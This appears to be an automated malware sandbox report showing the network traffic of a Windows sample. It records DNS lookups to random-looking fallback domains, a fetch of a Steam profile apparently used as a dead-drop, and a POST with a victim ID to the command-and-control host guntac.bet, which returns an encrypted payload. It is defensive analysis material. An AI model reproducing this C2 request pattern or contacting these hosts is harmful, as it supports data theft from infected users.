                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662314892 CET44349705104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662358046 CET49705443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663472891 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663495064 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663670063 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663847923 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663861990 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664632082 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664923906 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664962053 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665118933 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665337086 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665349007 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666090012 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666348934 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666361094 CET44349708104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666435957 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666582108 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666598082 CET44349708104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666635036 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:53.614005089 CET5135453192.168.2.8162.159.36.2
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:53.623581886 CET5351354162.159.36.2192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:53.623733044 CET5135453192.168.2.8162.159.36.2
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:53.634207964 CET5351354162.159.36.2192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:54.086061954 CET5135453192.168.2.8162.159.36.2
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:54.093499899 CET5351354162.159.36.2192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:54.093588114 CET5135453192.168.2.8162.159.36.2

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.298320055 CET5061053192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.315671921 CET53506101.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.318216085 CET5233653192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.668797016 CET53523361.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.735918999 CET5505053192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.748100996 CET53550501.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.750427961 CET6444753192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.762106895 CET53644471.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.045207977 CET6498753192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.056554079 CET53649871.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.125636101 CET5009153192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.138515949 CET53500911.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.141500950 CET5936053192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.153496027 CET53593601.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.155872107 CET5948253192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.165747881 CET53594821.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.167422056 CET5972653192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.175271034 CET53597261.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.322137117 CET4987353192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.339082956 CET53498731.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.579725981 CET6373353192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.587142944 CET53637331.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:53.613336086 CET5350270162.159.36.2192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:54.120948076 CET53646621.1.1.1192.168.2.8

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.298320055 CET192.168.2.81.1.1.10xe2ceStandard query (0)begindecafer.worldA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.318216085 CET192.168.2.81.1.1.10x91a8Standard query (0)garagedrootz.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.735918999 CET192.168.2.81.1.1.10x1295Standard query (0)modelshiverd.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.750427961 CET192.168.2.81.1.1.10x1b6cStandard query (0)arisechairedd.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.045207977 CET192.168.2.81.1.1.10x51bStandard query (0)catterjur.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.125636101 CET192.168.2.81.1.1.10x453dStandard query (0)orangemyther.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.141500950 CET192.168.2.81.1.1.10x712dStandard query (0)fostinjec.todayA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.155872107 CET192.168.2.81.1.1.10x24f5Standard query (0)sterpickced.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.167422056 CET192.168.2.81.1.1.10xf18dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.322137117 CET192.168.2.81.1.1.10x1c0dStandard query (0)guntac.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.579725981 CET192.168.2.81.1.1.10x4e6aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.315671921 CET1.1.1.1192.168.2.80xe2ceName error (3)begindecafer.worldnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.668797016 CET1.1.1.1192.168.2.80x91a8Name error (3)garagedrootz.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.748100996 CET1.1.1.1192.168.2.80x1295Name error (3)modelshiverd.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:10.762106895 CET1.1.1.1192.168.2.80x1b6cName error (3)arisechairedd.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.056554079 CET1.1.1.1192.168.2.80x51bName error (3)catterjur.runnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.138515949 CET1.1.1.1192.168.2.80x453dName error (3)orangemyther.livenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.153496027 CET1.1.1.1192.168.2.80x712dName error (3)fostinjec.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.165747881 CET1.1.1.1192.168.2.80x24f5Name error (3)sterpickced.digitalnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.175271034 CET1.1.1.1192.168.2.80xf18dNo error (0)steamcommunity.com104.73.234.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.339082956 CET1.1.1.1192.168.2.80x1c0dNo error (0)guntac.bet188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.339082956 CET1.1.1.1192.168.2.80x1c0dNo error (0)guntac.bet188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.587142944 CET1.1.1.1192.168.2.80x4e6aNo error (0)steamcommunity.com104.73.234.102A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • guntac.bet

                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.849682104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:13 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:14 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:13 GMT
                                                                                                                                                                                                                                      Content-Length: 36122
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=3305f16f0b7ac2a954b67115; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:14 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:14 UTC16384INData Raw: 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d
                                                                                                                                                                                                                                      Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector" data-
                                                                                                                                                                                                                                      2025-03-13 15:40:14 UTC3762INData Raw: 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65 6c 6c 69 70 73 69 73 22 3e 0a
                                                                                                                                                                                                                                      Data Ascii: id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name ellipsis">
                                                                                                                                                                                                                                      2025-03-13 15:40:14 UTC1566INData Raw: 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63
                                                                                                                                                                                                                                      Data Ascii: onsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.steamstatic.c


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.849683188.114.97.34436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:15 UTC262OUTPOST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 65
                                                                                                                                                                                                                                      Host: guntac.bet
                                                                                                                                                                                                                                      2025-03-13 15:40:15 UTC65OUTData Raw: 75 69 64 3d 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 26 63 69 64 3d
                                                                                                                                                                                                                                      Data Ascii: uid=ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518&cid=
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:16 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 14134
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qlpn8wfaYIt%2BbkkRsxntvzc08HSyRBXkG0uH9bpyuBSzwXebPb1g5WRaEO6G7ZktHNNsPW3l8YCrofK%2BM5GPATzhyOszw677NOSBsK8ZcKJdmxZ7dzPxpdCFp6h6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 91fca0f9c89d6f22-DFW
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44204&min_rtt=44094&rtt_var=16756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=963&delivery_rate=64387&cwnd=32&unsent_bytes=0&cid=51954ef0307dbbe8&ts=969&x=0"
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC598INData Raw: a7 e6 77 f4 fd f7 42 13 88 bf c5 b8 3e e2 da 5e c6 51 3c c1 10 2d 58 62 0b a7 3c d2 98 73 ba 51 ce 4f 4a 32 9b 58 1f eb 81 80 2d 11 46 38 60 4c aa b0 a7 85 0d 35 c3 58 5a fb c5 38 8f 28 1b 5f 9c fb 04 13 35 e1 6f 93 e0 8b 5f a0 24 3b 9f a0 96 01 dc 09 b4 5b 19 50 ba fe ee 65 45 48 b8 5f 15 f0 48 d5 c1 4b 52 9e 32 77 16 af 5d c6 5b e5 91 cd d6 78 4e 31 a6 bb 9f e9 13 39 3c cb 75 9b fc e6 04 80 b4 95 14 68 c3 62 fa f3 c9 de 99 ee db 6f 21 de ff 0b fa 83 00 c3 91 38 7e 04 f0 30 91 bb 2d 79 ad aa 7d 3f 28 dd f3 4c ad 29 53 a1 3f 1b 8a c8 36 47 37 a8 b3 f3 aa 8d fe a4 b3 c0 93 0c 5f 5c da 8c e2 72 3c f7 d9 90 19 1c 2e 46 aa 6e 1d 38 03 0e de f8 43 cb 8c 96 c3 b4 c6 f9 12 aa f9 fa af b7 47 a4 be 93 79 0d 55 27 0f 9b 80 cf 11 d7 1a b5 98 12 07 0f 6e 81 04 42 1c
                                                                                                                                                                                                                                      Data Ascii: wB>^Q<-Xb<sQOJ2X-F8`L5XZ8(_5o_$;[PeEH_HKR2w][xN19<uhbo!8~0-y}?(L)S?6G7_\r<.Fn8CGyU'nB
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: d0 6a 2c 7a e2 42 8e f9 c7 2d ba e7 2c 09 c0 4c d4 e0 2d ff 05 2b fe 39 00 62 7e 8b 93 b6 e2 e7 6e f1 fe 81 18 3e 85 d3 ca c8 8f 03 96 3b b7 d4 16 c6 48 05 c4 63 7e de f5 6a 18 54 59 54 6e 31 ed de 74 d0 c6 3a df 1b 63 f8 c3 f3 1e f3 4a 95 08 b7 8f 46 03 07 e3 0a c1 66 8a 2c 99 8c db 3a b8 38 14 c6 d4 47 27 24 70 93 99 86 62 af 79 c8 d0 c1 a3 3a 9a 98 e3 21 fc bd dc 40 fd 78 7b 8c 5a 08 95 ad 85 ba da 98 0f 44 f8 99 48 1f 8a ce 63 a3 a8 dd 93 07 97 f4 d4 f3 6a 20 09 49 79 c1 9b a4 b3 a9 63 4c 04 55 a4 51 d2 9d 3e fc ce 93 d4 ad dc f5 32 b7 9d 4a fd 9c ae de fc b9 2e 41 82 9b 73 f5 2f 6c b2 c9 fe 5a 86 2d 58 0f 9e cb d1 0e 3f 95 cc ee 83 4c ea 14 37 66 42 5a a0 1c df 77 01 2a 3e f0 7a 8f ee 7b f8 aa c7 7e 5d f8 0d dd ab 7d fd a0 a6 d3 8e 62 44 ba cb 0a 73
                                                                                                                                                                                                                                      Data Ascii: j,zB-,L-+9b~n>;Hc~jTYTn1t:cJFf,:8G'$pby:!@x{ZDHcj IycLUQ>2J.As/lZ-X?L7fBZw*>z{~]}bDs
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: 24 43 6f ad 1c 0d 22 c2 bd fa b6 c1 50 1b 9d 1a e9 ce 48 b2 5b 35 ec 8b 54 9e fc 7e a1 05 ca c9 ba a2 ec b8 4e 56 01 5e 3b 5a e2 f3 0b b5 f3 d1 a8 c2 bd 71 48 a4 2f 14 86 3c 46 f5 e8 9c b3 fb 32 d6 72 1b b1 7a 11 a4 4d b6 bc 46 79 70 ea 85 b7 0c 89 db b9 73 e0 8f c2 5c 01 c6 36 30 b4 13 2e 7d b7 f1 5b 99 bb 3b c0 55 2e ec e8 59 f5 8d cd 34 0f 08 1f d4 01 b1 a8 d1 97 8f 11 ca f7 07 d6 29 4a 8c be 60 61 7f 33 ca 48 f1 12 05 4d 87 ef 80 fe fa ee 8c 59 96 ef 56 62 b7 d2 65 fd c9 9b 7a a4 5a 2e cc d8 12 6a bb b1 01 cd 17 8a 14 99 72 79 ec 0b 55 54 25 4b 40 00 71 1b b5 3f 85 ad cb b6 f0 10 2e 00 07 b9 87 e1 20 78 d5 42 22 9d 14 8f 1d 0e 31 84 b3 3a 01 e5 1d 9a 61 8f 4b ac 04 b4 1e cb 1b 40 7e be b5 3e 15 7e a2 b9 00 8f ba ff 5f 00 43 56 2a 37 ac 41 2b 98 26 04
                                                                                                                                                                                                                                      Data Ascii: $Co"PH[5T~NV^;ZqH/<F2rzMFyps\60.}[;U.Y4)J`a3HMYVbezZ.jryUT%K@q?. xB"1:aK@~>~_CV*7A+&
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: c2 55 a1 4d c4 d8 06 82 83 e1 7a e8 56 8b 74 08 e2 c3 6d a8 db 3a df 5c 5c a5 e1 7c 1e a1 81 8e 33 4a 65 b5 2b 78 78 7c ef e4 80 32 96 a7 45 42 6a 49 3c c4 1e 97 ee 52 55 63 33 74 a7 4b c1 ad 4d 21 3f ff 34 c4 b4 61 4e a7 16 31 0c c3 ae 82 81 48 d1 65 27 29 84 a0 47 de c5 e4 d2 d8 84 66 b5 02 47 15 c6 95 fe e9 a2 56 bb c9 57 f7 ac 46 8d 0b d6 c3 26 b3 eb 54 90 d1 fb 99 e9 03 d0 4b 0b dc 43 ca 20 be 21 72 f3 e5 4f 22 b7 f6 d4 ca ee 6e 5d 61 b9 32 57 82 0e 2a 23 f1 78 cd ca c1 1e 6d a4 0b df 65 15 ae e4 6d 98 fe d6 95 65 fd c3 56 db d9 c4 6f cd ef d1 5a b9 1d 23 46 ae a5 fd 06 4b d2 65 25 18 b7 fa 61 c1 f7 8e 63 69 89 14 e1 28 ff 00 8b 7e 25 94 ad 6d 52 1c 76 d7 bb f8 eb 59 71 12 ea f7 8a 84 f3 2a 11 18 77 5f d8 2c 07 46 52 28 47 71 7c 27 e6 7b 1b 2e 20 d6
                                                                                                                                                                                                                                      Data Ascii: UMzVtm:\\|3Je+xx|2EBjI<RUc3tKM!?4aN1He')GfGVWF&TKC !rO"n]a2W*#xmemeVoZ#FKe%aci(~%mRvYq*w_,FR(Gq|'{.
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: ce a8 80 30 df 95 c9 6b 3a 1a e7 05 39 1f 44 97 2b b8 80 6a bd a4 8c 14 22 24 73 a0 90 64 cc 64 79 08 a5 46 25 87 06 9f b0 11 11 4b 12 38 58 ef 45 ab 2d 55 a9 80 d0 eb 56 45 6e b2 e1 0c dd 2d 14 15 8f e0 e3 e9 dc 4d aa bf 39 7b 6a b8 fb 24 b8 3f 44 c5 02 7f 77 82 2d b6 3a be cb 51 4f 08 b9 a5 47 f0 31 7d 96 0c f2 65 09 78 bb af 11 8a 50 f1 4b 21 3c be ba c4 2f 69 a6 14 30 07 06 a7 86 83 b6 f7 be a1 69 24 e4 df 54 e7 9c b9 79 6d 34 37 f1 cc 1b 9a f3 65 a5 73 49 d8 1c a1 30 82 b1 f6 c5 a5 ef 1d 6b fe dd 64 91 67 a0 68 b7 15 95 ca 15 68 76 00 9d 3f b8 6d cc 72 f3 01 14 df 26 25 be 6f 91 ae f9 c6 c4 ce 07 1d 93 e6 35 e9 72 0d d4 7e 50 e2 2b ec d9 4b 22 91 bc 2f a7 9f df a4 d1 7c ae c4 92 48 a4 75 03 73 7a bc 5e 1f b4 9b df ce ff 03 84 b5 81 db 1e aa 08 66 05
                                                                                                                                                                                                                                      Data Ascii: 0k:9D+j"$sddyF%K8XE-UVEn-M9{j$?Dw-:QOG1}exPK!</i0i$Tym47esI0kdghhv?mr&%o5r~P+K"/|Husz^f
